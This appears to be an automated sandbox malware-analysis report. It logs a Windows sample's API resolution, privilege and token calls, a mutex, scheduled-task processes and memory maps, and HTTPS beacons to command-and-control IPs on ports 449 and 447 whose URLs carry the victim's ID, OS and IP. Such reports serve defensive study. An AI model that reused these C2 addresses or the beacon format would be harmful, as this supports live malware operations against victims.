| Get Address | c:\windows\system32\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x773221e0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameW, address_out = 0x7fefdb11fd0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetTokenInformation, address_out = 0x7fefdb1bd50 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LookupAccountSidW, address_out = 0x7fefdb1b898 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = DuplicateTokenEx, address_out = 0x7fefdb0d310 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x7fefdb0afe8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EqualSid, address_out = 0x7fefdb1b820 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenProcessToken, address_out = 0x7fefdb1bd70 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = FreeSid, address_out = 0x7fefdb1b818 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x7fefdb1b63c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyKey, address_out = 0x7fefdb0afa0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x7fefdb0dac0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x7fefdb0db00 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDecrypt, address_out = 0x7fefdb3b6d0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x7fefdb0dad4 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptImportKey, address_out = 0x7fefdb0af6c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x7fefdb12040 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x7fefdb0dd10 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptSetKeyParam, address_out = 0x7fefdb3b508 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextW, address_out = 0x7fefdb0d98c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetHashParam, address_out = 0x7fefdb0db20 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x7fefdb1b9e0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x7fefdb1b9b0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RevertToSelf, address_out = 0x7fefdb0dd00 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7fefee07490 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x7fefee01314 |
|
1 | |
| Get Address | Unknown module name | function = CryptStringToBinaryW, address_out = 0x7fefd73e9a0 |
|
1 | |
| Get Address | Unknown module name | function = CryptBinaryToStringW, address_out = 0x7fefd724198 |
|
1 | |
| Get Address | Unknown module name | function = PathFindFileNameW, address_out = 0x7feff2c3920 |
|
1 | |
| Get Address | Unknown module name | function = PathAddBackslashW, address_out = 0x7feff2c3f70 |
|
1 | |
| Get Address | Unknown module name | function = PathRenameExtensionW, address_out = 0x7feff2de6c0 |
|
1 | |
| Get Address | Unknown module name | function = StrStrIW, address_out = 0x7feff2bfb70 |
|
1 | |
| Get Address | Unknown module name | function = PathRemoveBackslashW, address_out = 0x7feff2bd014 |
|
1 | |
| Get Address | Unknown module name | function = PathRemoveFileSpecW, address_out = 0x7feff2ba43c |
|
1 | |
| Get Address | Unknown module name | function = PathFindExtensionW, address_out = 0x7feff2c2b00 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x775914a0 |
|
1 | |
| Get Address | Unknown module name | function = GetAdaptersInfo, address_out = 0x7fefb7e792c |
|
1 | |
| Get Address | Unknown module name | function = CreateEnvironmentBlock, address_out = 0x7fefc8410b0 |
|
1 | |
| Get Address | Unknown module name | function = DestroyEnvironmentBlock, address_out = 0x7fefc841080 |
|
1 | |
| Get Address | Unknown module name | function = LoadUserProfileW, address_out = 0x7fefc841170 |
|
1 | |
| Get Address | Unknown module name | function = UnloadUserProfile, address_out = 0x7fefc843670 |
|
1 | |
| Get Address | Unknown module name | function = NCryptOpenStorageProvider, address_out = 0x7fefcf29990 |
|
1 | |
| Get Address | Unknown module name | function = NCryptImportKey, address_out = 0x7fefcf255f0 |
|
1 | |
| Get Address | Unknown module name | function = NCryptDeleteKey, address_out = 0x7fefcf4f6a0 |
|
1 | |
| Get Address | Unknown module name | function = NCryptFreeObject, address_out = 0x7fefcf25c30 |
|
1 | |
| Get Address | Unknown module name | function = BCryptOpenAlgorithmProvider, address_out = 0x7fefcef2640 |
|
1 | |
| Get Address | Unknown module name | function = BCryptImportKeyPair, address_out = 0x7fefcef1d30 |
|
1 | |
| Get Address | Unknown module name | function = BCryptGetProperty, address_out = 0x7fefcef1510 |
|
1 | |
| Get Address | Unknown module name | function = BCryptVerifySignature, address_out = 0x7fefcf05bc0 |
|
1 | |
| Get Address | Unknown module name | function = BCryptCloseAlgorithmProvider, address_out = 0x7fefcef32b0 |
|
1 | |
| Get Address | Unknown module name | function = BCryptDestroyKey, address_out = 0x7fefcef16a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x775933a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x77343050 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x77343070 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x77573f20 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7732b7e0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Sleep | duration = 30000 milliseconds (30.000 seconds) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
36 | |
| Sleep | duration = 20000 milliseconds (20.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2017-09-25 20:33:39 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 130619 |
|
1 | |
| Get Time | type = Ticks, time = 130650 |
|
1 | |
| Get Time | type = Ticks, time = 140884 |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = Hardware Information |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\VLock |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 1.36 KB (1392 bytes) |
| Total Data Received | 0.77 KB (787 bytes) |
| Contacted Host Count | 3 |
| Contacted Hosts | 89.231.13.38, myexternalip.com, 212.38.166.20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 |
| Server Name | 89.231.13.38 |
| Server Port | 449 |
| Data Sent | 0.76 KB (779 bytes) |
| Data Received | 0.75 KB (769 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 89.231.13.38, server_port = 449 |
|
1 | |
| Open HTTP Request | http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 224, size_out = 224 |
|
1 | |
| Open HTTP Request | http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/ |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 537, size_out = 537 |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 |
| Server Name | myexternalip.com |
| Server Port | 0 |
| Data Sent | 0.27 KB (274 bytes) |
| Data Received | 0.02 KB (18 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = myexternalip.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, target_resource = /raw, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = myexternalip.com/raw |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 14, size_out = 14 |
|
1 | |
| Close Session |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 |
| Server Name | 212.38.166.20 |
| Server Port | 447 |
| Data Sent | 0.33 KB (339 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 212.38.166.20, server_port = 447 |
|
1 | |
| Open HTTP Request | http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/ |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:LUA[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:49, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:37 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x2b4 |
| Parent PID | 0x354 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE0
0x
114
0x
578
0x
464
0x
438
0x
454
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000370000 | 0x00370000 | 0x004f7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000500000 | 0x00500000 | 0x00680fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000690000 | 0x00690000 | 0x01a8ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001a90000 | 0x01a90000 | 0x01e82fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x01ea0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f80000 | 0x01f80000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002020000 | 0x02020000 | 0x0209ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000020a0000 | 0x020a0000 | 0x0219ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000021a0000 | 0x021a0000 | 0x0227efff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02320000 | 0x025eefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002680000 | 0x02680000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002940000 | 0x02940000 | 0x029bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029f0000 | 0x029f0000 | 0x02a6ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernel32.dll | 0x77320000 | 0x7743efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77440000 | 0x77539fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77540000 | 0x776e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| taskeng.exe | 0xffe30000 | 0xffea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| tschannel.dll | 0x7fef6130000 | 0x7fef6138fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x7fefaec0000 | 0x7fefaed7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x7fefb2a0000 | 0x7fefb2f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| xmllite.dll | 0x7fefb380000 | 0x7fefb3b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ktmw32.dll | 0x7fefb3c0000 | 0x7fefb3c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefca60000 | 0x7fefcaa6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x7fefceb0000 | 0x7fefcec6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wevtapi.dll | 0x7fefcfb0000 | 0x7fefd01cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x7fefd350000 | 0x7fefd374fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x7fefd380000 | 0x7fefd38efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x7fefd470000 | 0x7fefd483fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x7fefd680000 | 0x7fefd6eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x7fefd860000 | 0x7fefd98cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x7fefd990000 | 0x7fefda28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x7fefda30000 | 0x7fefda5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x7fefdb00000 | 0x7fefdbdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x7fefdd60000 | 0x7fefddc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x7fefddd0000 | 0x7fefded8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x7fefdee0000 | 0x7fefdfa8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x7fefed40000 | 0x7fefeddefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x7fefede0000 | 0x7fefefe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x7feff2b0000 | 0x7feff320fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x7feff330000 | 0x7feff33dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x7feff5b0000 | 0x7feff5cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x7feff5d0000 | 0x7feff6a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x7feff860000 | 0x7feff860fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:Highest[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:49, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:37 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x7d0 |
| Parent PID | 0x354 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AE4
0x
7F0
0x
7EC
0x
7E0
0x
7D8
0x
7D4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001b70000 | 0x01b70000 | 0x01f62fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002010000 | 0x02010000 | 0x0208ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000020a0000 | 0x020a0000 | 0x0211ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002130000 | 0x02130000 | 0x021affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000021c0000 | 0x021c0000 | 0x0223ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002240000 | 0x02240000 | 0x0233ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02480000 | 0x0274efff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000002750000 | 0x02750000 | 0x0282efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002830000 | 0x02830000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029b0000 | 0x029b0000 | 0x02a2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a60000 | 0x02a60000 | 0x02adffff | Private Memory | Readable, Writable |
|
|
|
|
| kernel32.dll | 0x77320000 | 0x7743efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77440000 | 0x77539fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77540000 | 0x776e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| taskeng.exe | 0xffe30000 | 0xffea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| tschannel.dll | 0x7fef6130000 | 0x7fef6138fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x7fefaec0000 | 0x7fefaed7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x7fefb2a0000 | 0x7fefb2f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| xmllite.dll | 0x7fefb380000 | 0x7fefb3b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ktmw32.dll | 0x7fefb3c0000 | 0x7fefb3c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefca60000 | 0x7fefcaa6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x7fefceb0000 | 0x7fefcec6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wevtapi.dll | 0x7fefcfb0000 | 0x7fefd01cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x7fefd350000 | 0x7fefd374fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x7fefd380000 | 0x7fefd38efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x7fefd470000 | 0x7fefd483fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x7fefd680000 | 0x7fefd6eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x7fefd860000 | 0x7fefd98cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x7fefd990000 | 0x7fefda28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x7fefda30000 | 0x7fefda5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x7fefdb00000 | 0x7fefdbdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x7fefdd60000 | 0x7fefddc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x7fefddd0000 | 0x7fefded8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x7fefdee0000 | 0x7fefdfa8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x7fefed40000 | 0x7fefeddefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x7fefede0000 | 0x7fefefe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x7feff2b0000 | 0x7feff320fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x7feff330000 | 0x7feff33dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x7feff5b0000 | 0x7feff5cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x7feff5d0000 | 0x7feff6a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x7feff860000 | 0x7feff860fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
|
